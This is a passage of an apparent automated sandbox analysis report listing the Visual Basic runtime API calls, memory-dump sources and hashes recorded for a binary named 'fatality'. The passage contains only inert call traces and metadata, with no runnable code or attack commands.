                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Error$ListSystem$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrCheckCloseConstruct2DestructGenerateHandleHresultOverflowUnicode
                                                                                                                                                            • String ID: D
                                                                                                                                                            • API String ID: 3069481506-2746444292
                                                                                                                                                            • Opcode ID: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                            • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                                                                            • Opcode Fuzzy Hash: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                            • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1066637744-0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                            • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                            • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                            • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                            • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                            • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                            • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                            • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                            • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                            • String ID: yymmdd
                                                                                                                                                            • API String ID: 2807397001-2871001947

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 652 40290c-402932 #100 653 402933-402934 652->653 653->653 654 402936-402942 653->654
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: #100
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1341478452-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E3F
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E47
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 00412E4B
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000101,?,00000000), ref: 00412E76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412E89
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412E95
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412EAE
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000100,?,00000000), ref: 00412EE7
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412EFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412F06
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412F1F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00412F30
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00412F3C
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000278,?,00000000), ref: 00412F62
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,00000000), ref: 00412F71
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,0000011C,?,00000000), ref: 00412F91
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000084,?,00000000), ref: 00412FDC
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,0000008C,?,00000000), ref: 00413024
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000154,?,00000000), ref: 00413049
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000050,?,00000000), ref: 0041306D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,000000E0,?,00000000), ref: 004130A3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 004130C9
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000264,?,00000000), ref: 004130FE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00413110
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00413138
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041314C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041317F
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 0041320C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413234
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413252
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?), ref: 00413270
                                                                                                                                                            • #537.MSVBVM60(00000000,?), ref: 004132B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132C3
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132CD
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000), ref: 004132D2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132DC
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132DF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132E9
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000), ref: 004132EE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004132F8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004132FB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413305
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041332C
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 00413355
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041335F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00413362
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041336C
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 00413377
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413381
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00413384
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041338E
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 00413399
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004133A3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004133A6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004133B0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 004133D7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413434
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413487
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041349F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004134BF
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004134D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413516
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413548
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 004135CC
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413610
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413645
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413654
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413667
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041368D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041369E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004136D5
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413706
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413715
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413728
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413748
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413757
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413786
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 004137B7
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 004137C6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004137D9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004137F9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041382A
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 0041385F
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 0041386E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413885
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004138B8
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413900
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413935
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413944
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413957
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041397D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041398E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004139C5
